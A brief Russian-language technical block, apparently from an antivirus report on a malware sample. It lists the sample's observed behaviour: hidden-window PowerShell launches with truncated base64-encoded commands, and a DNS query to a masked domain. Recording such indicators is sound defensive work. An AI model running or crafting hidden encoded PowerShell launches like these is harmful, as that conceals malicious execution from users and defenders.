Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WinDowsTyle hidden -e KAAoACgAIgB7ADQAOAB9AHsANQA0AH0AewA2ADQAfQB7ADUAfQB7ADcAfQB7ADEANQB9AHsANwAzAH0AewAwAH0AewA1ADkAfQB7ADEAMAA2AH0AewA0ADUAfQB7ADIAMAB9AHsAMQAwADIAfQB7ADUANQB9AHsAOAA1AH0Aew...
- DNS ASK bc####qhewqe.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WinDowsTyle hidden -e KAAoACgAIgB7ADQAOAB9AHsANQA0AH0AewA2ADQAfQB7ADUAfQB7ADcAfQB7ADEANQB9AHsANwAzAH0AewAwAH0AewA1ADkAfQB7ADEAMAA2AH0AewA0ADUAfQB7ADIAMAB9AHsAMQAwADIAfQB7ADUANQB9AHsAOAA1AH0Aew...' (со скрытым окном)